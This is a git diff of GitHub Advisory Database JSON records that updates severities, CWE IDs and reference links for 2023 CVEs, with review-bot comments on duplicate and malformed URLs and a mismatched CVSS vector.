--- a/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json +++ b/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json b/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json index 9a335f459fe2a..3bfffdc63e62a 100644 --- a/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json +++ b/advisories/unreviewed/2023/03/GHSA-vxpc-466w-pjjv/GHSA-vxpc-466w-pjjv.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27672" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-1045" diff --git a/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json b/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json index 03b242c8afe53..efd8b83834392 100644 --- a/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json +++ b/advisories/unreviewed/2023/03/GHSA-w2w6-xp88-5cvw/GHSA-w2w6-xp88-5cvw.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.couchbase.com/alerts/" diff --git a/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json b/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json index e4fb2172bdec8..a187e230752dc 100644 --- a/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json +++ b/advisories/unreviewed/2023/04/GHSA-354q-38f3-jh4j/GHSA-354q-38f3-jh4j.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-354q-38f3-jh4j", - "modified": "2023-05-05T15:30:59Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-04-25T21:30:29Z", "aliases": [ "CVE-2023-2269" @@ -29,6 +29,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/63AJUCJTZCII2JMAF7MGZEM66KY7IALT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FBLBKW2WM5YSTS6OGEU5SYHXSJ5EWSTV/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IXHBLWYNSUBS77TYPOJTADPDXKBH2F4U/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63AJUCJTZCII2JMAF7MGZEM66KY7IALT/" @@ -41,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IXHBLWYNSUBS77TYPOJTADPDXKBH2F4U/" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/lkml/ZD1xyZxb3rHot8PV%40redhat.com/t/" + }, { "type": "WEB", "url": "https://lore.kernel.org/lkml/ZD1xyZxb3rHot8PV@redhat.com/t/" @@ -63,7 +79,7 @@ "CWE-413", "CWE-667" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-25T21:15:10Z" diff --git a/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json b/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json index 305b8bc5b8381..3950040803c2f 100644 --- a/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json +++ b/advisories/unreviewed/2023/04/GHSA-7cv2-wjgm-j7rm/GHSA-7cv2-wjgm-j7rm.json 
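Review bot: The three Fedora URLs added in the `@@ -29,6 +29,18 @@` hunk of GHSA-354q-38f3-jh4j differ from the entries that already follow them only in `%40` versus `@`, so each package-announce message is now listed twice in `references`. Consumers that key on the raw `url` string will treat them as distinct sources, and tooling that counts or displays references per advisory will over-report. Normalise percent-encoding before insert or drop the `%40` variants, keeping one entry per message such as `https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63AJUCJTZCII2JMAF7MGZEM66KY7IALT/`; the following hunk repeats the pattern with `https://lore.kernel.org/lkml/ZD1xyZxb3rHot8PV%40redhat.com/t/`. If these files mirror the NVD feed verbatim, the de-duplication belongs in the import step rather than in this file.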
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7cv2-wjgm-j7rm", - "modified": "2023-05-03T21:30:17Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-04-24T21:30:30Z", "aliases": [ "CVE-2023-28484" @@ -36,13 +36,17 @@ { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230601-0006/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-24T21:15:09Z" diff --git a/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json b/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json deleted file mode 100644 index e993fa7abbe89..0000000000000 --- a/advisories/unreviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7gqc-q9mc-6348", - "modified": "2023-04-21T18:30:23Z", - "published": "2023-04-12T18:30:35Z", - "aliases": [ - "CVE-2023-30532" - ], - "details": "A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30532" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2851" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/04/13/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-04-12T18:15:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json b/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json index 28a5c88d9e3cb..15f624b190806 100644 --- a/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json +++ b/advisories/unreviewed/2023/04/GHSA-cpmq-crvm-2w5p/GHSA-cpmq-crvm-2w5p.json @@ -33,6 +33,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00020.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3HU4PKLUVB5CTMOVQ2GV33TNUNMJCBGD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BBXEXL2ZQBWCBLNUP6P67FHECXQWSK3L/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GM66PNHGCXZU66LQCTP2FSJLFF6CVMSI/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HU4PKLUVB5CTMOVQ2GV33TNUNMJCBGD/" diff --git a/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json b/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json index d1aece98ab2a5..c6d59d09c5780 100644 --- a/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json +++ b/advisories/unreviewed/2023/04/GHSA-g7cg-jg33-rrhv/GHSA-g7cg-jg33-rrhv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g7cg-jg33-rrhv", - "modified": "2023-04-26T21:30:37Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-04-26T21:30:37Z", "aliases": [ "CVE-2023-27559" 
@@ -28,13 +28,21 @@ { "type": "WEB", "url": "https://https://www.ibm.com/support/pages/node/6985667" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20230511-0010/" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/6985667" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-26T20:15:09Z" diff --git a/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json b/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json index 69254b2ee4ea9..9a5daff0af765 100644 --- a/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json +++ b/advisories/unreviewed/2023/04/GHSA-pwx9-2gvj-242v/GHSA-pwx9-2gvj-242v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pwx9-2gvj-242v", - "modified": "2023-05-04T18:30:51Z", + "modified": "2024-02-04T09:30:40Z", "published": "2023-04-25T15:30:27Z", "aliases": [ "CVE-2022-42335" @@ -21,10 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42335" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PSPFWSY6UOPGMADQGOGN2PAAS5LJRPTG/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PSPFWSY6UOPGMADQGOGN2PAAS5LJRPTG/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-430.txt" @@ -42,7 +50,7 @@ "cwe_ids": [ "CWE-476" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-04-25T13:15:09Z" 
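Review bot: The `@@ -28,13 +28,21 @@` hunk of GHSA-g7cg-jg33-rrhv adds the correct `https://www.ibm.com/support/pages/node/6985667` next to the existing `https://https://www.ibm.com/support/pages/node/6985667`, which has a doubled scheme and cannot resolve, so the advisory now carries a dead link and a live one for the same IBM page. The malformed entry should be removed rather than left beside its replacement, or the importer should reject any `url` whose scheme does not parse before it is stored. The `severity` change to HIGH in the same hunk is consistent with CWE-20 but is inherited from the upstream score, which is worth confirming against the IBM page now that a reachable link exists.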
diff --git a/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json b/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json index 518b83582b98b..42a1b2637e313 100644 --- a/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json +++ b/advisories/unreviewed/2023/04/GHSA-vh2x-5rx6-qqhv/GHSA-vh2x-5rx6-qqhv.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00004.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230517-0009/" diff --git a/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json b/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json index e71eb9b99cc59..f55f960b0b76a 100644 --- a/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json +++ b/advisories/unreviewed/2023/05/GHSA-28m3-c955-h29j/GHSA-28m3-c955-h29j.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json b/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json index da696343f1e69..9db4409793b6b 100644 --- a/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json +++ b/advisories/unreviewed/2023/05/GHSA-36cr-wp3c-5h2p/GHSA-36cr-wp3c-5h2p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-36cr-wp3c-5h2p", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33793" 
@@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json b/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json index 82fd003382ec2..f2f57d86b7206 100644 --- a/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json +++ b/advisories/unreviewed/2023/05/GHSA-3777-fm87-36r8/GHSA-3777-fm87-36r8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3777-fm87-36r8", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33788" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json b/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json index a880cd023dfa3..2a476f44b3b48 100644 --- a/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json +++ b/advisories/unreviewed/2023/05/GHSA-44xq-533g-gj79/GHSA-44xq-533g-gj79.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json b/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json index 11c6635fcf2bd..c184f08f4f98c 100644 --- a/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json +++ b/advisories/unreviewed/2023/05/GHSA-4w75-4x78-6882/GHSA-4w75-4x78-6882.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4w75-4x78-6882", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33791" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json b/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json index b45b7342812a0..e9466bde8f663 100644 --- a/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json +++ b/advisories/unreviewed/2023/05/GHSA-53r9-cff5-x7hq/GHSA-53r9-cff5-x7hq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-53r9-cff5-x7hq", - "modified": "2023-05-05T09:30:15Z", + "modified": "2024-02-02T18:30:23Z", "published": "2023-05-05T09:30:15Z", "aliases": [ "CVE-2023-28068" @@ -28,9 +28,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-732" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-05T07:15:08Z" diff --git a/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json b/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json index 234612d739def..af8906bfba7cc 100644 --- a/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json +++ b/advisories/unreviewed/2023/05/GHSA-5ccq-3h49-vjp2/GHSA-5ccq-3h49-vjp2.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" 
diff --git a/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json b/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json index bb1d35995552f..831fab0f27d6e 100644 --- a/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json +++ b/advisories/unreviewed/2023/05/GHSA-72w4-56w3-7485/GHSA-72w4-56w3-7485.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-72w4-56w3-7485", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:27Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33786" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json b/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json index 7304ea11b5235..9c7b5800518a5 100644 --- a/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json +++ b/advisories/unreviewed/2023/05/GHSA-7g49-wq8x-r6rh/GHSA-7g49-wq8x-r6rh.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json b/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json index 1358416b70619..714a67f6f9225 100644 --- a/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json +++ b/advisories/unreviewed/2023/05/GHSA-7jf7-rx7v-xwqq/GHSA-7jf7-rx7v-xwqq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7jf7-rx7v-xwqq", - "modified": "2023-05-16T18:30:15Z", + "modified": "2024-02-03T03:30:27Z", "published": "2023-05-10T00:30:16Z", "aliases": [ "CVE-2023-2156" 
@@ -66,7 +66,7 @@ "cwe_ids": [ "CWE-617" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-09T22:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json b/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json index d62735ea8b969..bc71e641337cc 100644 --- a/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json +++ b/advisories/unreviewed/2023/05/GHSA-8w3x-9pj3-2gw8/GHSA-8w3x-9pj3-2gw8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8w3x-9pj3-2gw8", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:27Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33787" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json b/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json index 2999d3bfbcd48..f7f991215b02d 100644 --- a/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json +++ b/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-94hm-2957-3gcc", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:20Z", "aliases": [ "CVE-2023-33800" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:11Z" diff --git a/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json b/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json index cadd3a25299cb..07c18ccb770fd 100644 
--- a/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json +++ b/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c8cv-8gr5-5v2w", - "modified": "2023-06-02T03:30:22Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-05-27T00:30:19Z", "aliases": [ "CVE-2023-2898" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/linux-f2fs-devel/20230522124203.3838360-1-chao%40kernel.org/" + }, { "type": "WEB", "url": "https://lore.kernel.org/linux-f2fs-devel/20230522124203.3838360-1-chao@kernel.org/" @@ -47,7 +51,7 @@ "CWE-362", "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-26T22:15:14Z" diff --git a/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json b/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json index 60685794b633a..ba03cff6e7419 100644 --- a/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json +++ b/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fcqj-x222-4c7r", - "modified": "2023-05-11T12:30:14Z", + "modified": "2024-01-29T21:30:25Z", "published": "2023-05-11T12:30:14Z", "aliases": [ "CVE-2023-31445" ], "details": "Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ 
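Review bot: The CVSS vector added in the `@@ -1,14 +1,17 @@` hunk of GHSA-fcqj-x222-4c7r, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`, scores the issue as requiring no privileges, while the `details` text on the same hunk describes it as something "read-only users" can do, which reads as an authenticated, low-privilege actor (`PR:L`). If the enumeration endpoint really is reachable without a session the description should say so; otherwise the vector should be `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N`, which would also lower the derived `severity`. The vector is presumably copied from the upstream record, so the right fix may be to raise it with the source rather than patch it here.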
@@ -18,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31445" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202331445/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure" @@ -25,13 +32,17 @@ { "type": "WEB", "url": "https://www.cassianetworks.com" + }, + { + "type": "WEB", + "url": "https://www.swiruhack.online/cves/202331445/md.html" } ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-11T12:15:09Z" diff --git a/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json b/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json index 0c855b96688c3..00601978de680 100644 --- a/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json +++ b/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g22j-4jxh-2vc7", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33796" @@ -34,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json b/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json index f577e45e82c1a..8edd7c44a3aec 100644 --- a/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json +++ b/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json 
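Review bot: The references added to GHSA-fcqj-x222-4c7r in the `@@ -25,13 +32,17 @@` hunk (`https://www.swiruhack.online/cves/202331445/md.html`, and `https://blog.kscsc.online/cves/202331445/md.html` in the hunk before it) are third-party write-ups, and together with the existing PoC repository they leave the bare vendor homepage `https://www.cassianetworks.com` as the only vendor link, so a reader has no authoritative source for the fixed build named in `details`. If a vendor advisory or release note exists it should be added as the primary reference; if not, the entry is honest as it stands but practitioners should know the fix version rests on the CVE text alone. The new `CWE-732` classification and `MODERATE` severity are both upstream-derived and should be read with that in mind.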
